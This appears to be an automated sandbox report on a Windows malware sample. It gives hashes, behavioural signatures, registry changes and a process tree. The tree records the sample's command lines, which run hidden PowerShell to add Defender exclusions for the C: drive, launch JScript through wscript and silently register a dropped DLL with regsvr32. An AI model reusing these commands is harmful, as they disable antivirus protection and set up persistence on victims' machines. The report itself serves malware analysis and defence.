Analysis
max time kernel: 119s
max time network: 125s
platform: windows11-21h2_x64
resource: win11-20240508-en
resource tags: arch:x64 arch:x86 image:win11-20240508-en locale:en-us os:windows11-21h2-x64 system
submitted: 26/06/2024, 20:32
Static task
static1
Behavioral task
behavioral1
Sample
2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe
Resource
win10v2004-20240611-en
Behavioral task
behavioral3
Sample
2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe
Resource
win11-20240508-en
General
Target: 2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe
Size: 428KB
MD5: 2a90a7ccf98e12ba57583e1e012eca18
SHA1: 66512ffb8c58d1444622ff64f189cd7db7dbde1d
SHA256: 2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8
SHA512: b7fbfbfc94c06337fd7bcf933f73f39d3c1aa7f17b4708e846e4ba64cab59249736e8733b8a627ed5292e568cfd5e0106275cec8b8dded8fd71cb60e285a72e5
SSDEEP: 6144:1OYGXaPNxdgSdcq2pVZPOJHAbK/egjnOtOjgndbpZgBJDEFdkYnC:xGqN/XdctpVtkPewnOtHd98EQYC
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1672 | 2672 | wscript.exe | 85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1228 | 2672 | powershell.exe | 85
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid | Process
3928 | powershell.exe
1228 | powershell.exe
3960 | powershell.exe
3960 | powershell.exe
3928 | powershell.exe
Deletes itself 1 IoCs
pid | Process
1792 | wscript.exe
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Loads dropped DLL 1 IoCs
pid | Process
4488 | regsvr32.exe
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 12 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\DynamicWrapperX\CLSID | regsvr32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1" | wscript.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1" | wscript.exe
Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\WOW6432Node\CLSID | regsvr32.exe
Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC} | regsvr32.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\dynwrapx.dll" | regsvr32.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}" | regsvr32.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinNT | wscript.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinNT | wscript.exe
Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32 | regsvr32.exe
Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\WOW6432Node | regsvr32.exe
Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\DynamicWrapperX | regsvr32.exe
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid | Process
3960 | powershell.exe
3928 | powershell.exe
3960 | powershell.exe
3928 | powershell.exe
1228 | powershell.exe
1228 | powershell.exe
1228 | powershell.exe
1228 | powershell.exe
1228 | powershell.exe
Suspicious behavior: RenamesItself 1 IoCs
pid | Process
1792 | wscript.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs
description | pid | Process
Token: SeDebugPrivilege | 3960 | powershell.exe
Token: SeDebugPrivilege | 3928 | powershell.exe
Token: SeDebugPrivilege | 1228 | powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs
pid | Process
1228 | powershell.exe
Suspicious use of WriteProcessMemory 19 IoCs
description | pid | Process | procid_target
PID 1620 wrote to memory of 4124 | 1620 | 2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe | 77
PID 1620 wrote to memory of 4124 | 1620 | 2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe | 77
PID 1620 wrote to memory of 4124 | 1620 | 2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe | 77
PID 4124 wrote to memory of 3960 | 4124 | cmd.exe | 79
PID 4124 wrote to memory of 3960 | 4124 | cmd.exe | 79
PID 4124 wrote to memory of 3960 | 4124 | cmd.exe | 79
PID 4124 wrote to memory of 1792 | 4124 | cmd.exe | 81
PID 4124 wrote to memory of 1792 | 4124 | cmd.exe | 81
PID 4124 wrote to memory of 1792 | 4124 | cmd.exe | 81
PID 1792 wrote to memory of 3928 | 1792 | wscript.exe | 83
PID 1792 wrote to memory of 3928 | 1792 | wscript.exe | 83
PID 1792 wrote to memory of 3928 | 1792 | wscript.exe | 83
PID 1792 wrote to memory of 4488 | 1792 | wscript.exe | 87
PID 1792 wrote to memory of 4488 | 1792 | wscript.exe | 87
PID 1792 wrote to memory of 4488 | 1792 | wscript.exe | 87
PID 1228 wrote to memory of 1988 | 1228 | powershell.exe | 90
PID 1228 wrote to memory of 1988 | 1228 | powershell.exe | 90
PID 1988 wrote to memory of 4796 | 1988 | csc.exe | 91
PID 1988 wrote to memory of 4796 | 1988 | csc.exe | 91
Processes
C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe
"C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe"
- Suspicious use of WriteProcessMemory
PID:1620

  C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 14438590 76 "C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe")
  - Suspicious use of WriteProcessMemory
  PID:4124

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3960

    C:\Windows\SysWOW64\wscript.exe
    wscript.exe /E:jscript 14438590 76 "C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe"
    - Deletes itself
    - Modifies registry class
    - Suspicious behavior: RenamesItself
    - Suspicious use of WriteProcessMemory
    PID:1792

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:3928

      C:\Windows\SysWOW64\regsvr32.exe
      "C:\Windows\System32\regsvr32.exe" /i /s "C:\Users\Admin\AppData\Local\dynwrapx.dll"
      - Loads dropped DLL
      - Modifies registry class
      PID:4488

C:\Windows\SysWOW64\wscript.exe
C:\Windows\SysWOW64\wscript.exe "C:\Users\Admin\AppData\Local\337b936d0.js" 76
- Process spawned unexpected child process
- Modifies registry class
PID:1672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc 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
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1228

  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vog5v3pr\vog5v3pr.cmdline"
  - Suspicious use of WriteProcessMemory
  PID:1988

    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5582.tmp" "c:\Users\Admin\AppData\Local\Temp\vog5v3pr\CSC506EC633A7DB4C639C11D1478775EC5E.TMP"
    PID:4796
Network
MITRE ATT&CK Enterprise v15
Downloads